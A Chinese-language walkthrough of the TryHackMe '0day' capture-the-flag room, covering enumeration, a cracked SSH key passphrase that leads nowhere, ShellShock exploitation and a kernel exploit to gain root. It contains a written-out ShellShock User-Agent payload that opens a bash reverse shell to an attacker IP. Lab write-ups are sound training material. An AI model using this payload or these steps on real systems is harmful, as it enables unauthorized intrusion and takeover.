Tryhackme – 0day Walkthrough

枚舉

先用Nmap帶-sC -sV下去掃

在這邊可以看到對面開22跟80 感覺80是進入點

進去以後感覺像是一個個人介紹的網頁? 但看起來沒什麼東西可以利用
對著路徑掃下去以後可以看到蠻多可疑的東西
200 – /admin/  CMS login page(?
200 – /backup/  backup files(?
200 – /cgi-bin/test.cgi  ShellShock(?
200 – /robots.txt  Disallow path(?
200 – /secret/  Secret file(?
200 – /uploads/  Upload path(?

對著admin往下掃下去

有一個index.html

連上去以後感覺什麼都沒有
對著backup掃下去
也是一個index.html
看起來很像id_rsa?
把它下載下來 然後嘗試用”ryan” , “montgomery”, “ryan_montgomery”, “0day”來登入
需要密碼
用ssh2john.py把Hash提出來 然後破解
密碼是letmein
重新登入 並嘗試用”ryan”, “montgomery”, “ryan_montgomery”, “0day”來登入
都失敗 這是一個兔子洞

重新用nmap帶shellshock的script掃test.cgi

確認有ShellShock漏洞 希望這不是兔子洞

漏洞利用

用Burp送出ShellShock的Payload
User-Agent: () { :;}; /bin/bash -c 'bash -i >& /dev/tcp/10.17.5.224/443 0>&1'
成功接到Reverse Shell

提權

跑linPEAS

發現Kernel的版本可能有漏洞 或許能打Kernel Exploit?
去Google “Linux Kernel Exploit 3.13” 找到一個Exploit
https://www.exploit-db.com/exploits/37292
丟到對面機器編譯後執行
發現爛掉 把錯誤訊息丟Google可以找到一篇文章
https://stackoverflow.com/questions/56810443/gcc-without-full-path-error-trying-to-exec-cc1-execvp-no-such-file-or-direc
看起來只是機器的PATH爛掉 重新設定就好了
有用 我們拿到root了

root.txt

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。

four × two =

Back To Top
error: Content is protected !!